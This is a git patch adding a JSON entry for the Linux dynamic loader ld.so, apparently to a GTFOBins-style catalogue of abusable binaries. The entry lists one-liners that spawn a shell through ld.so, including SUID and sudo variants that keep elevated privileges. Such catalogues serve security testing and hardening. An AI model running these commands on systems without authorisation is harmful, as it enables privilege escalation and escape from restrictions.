From af05253a14e33027463cc7d5ef76042a9bb655b3 Mon Sep 17 00:00:00 2001 From: t0thkr1s Date: Thu, 9 Jan 2020 18:14:55 +0100 Subject: [PATCH] add data for ld.so --- data/ld.so.json | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 data/ld.so.json diff --git a/data/ld.so.json b/data/ld.so.json new file mode 100644 index 0000000..7994e55 --- /dev/null +++ b/data/ld.so.json @@ -0,0 +1,20 @@ +{ + "description": "'ld.so' is the Linux dynamic linker/loader, its filename and location might change across distributions. The proper path is can be obtained with:\n```\n$ strings /proc/self/exe | head -1\n/lib64/ld-linux-x86-64.so.2\n```", + "functions": { + "shell": [ + { + "code": "/lib/ld.so /bin/sh" + } + ], + "suid": [ + { + "code": "./ld.so /bin/sh -p" + } + ], + "sudo": [ + { + "code": "sudo /lib/ld.so /bin/sh" + } + ] + } +} \ No newline at end of file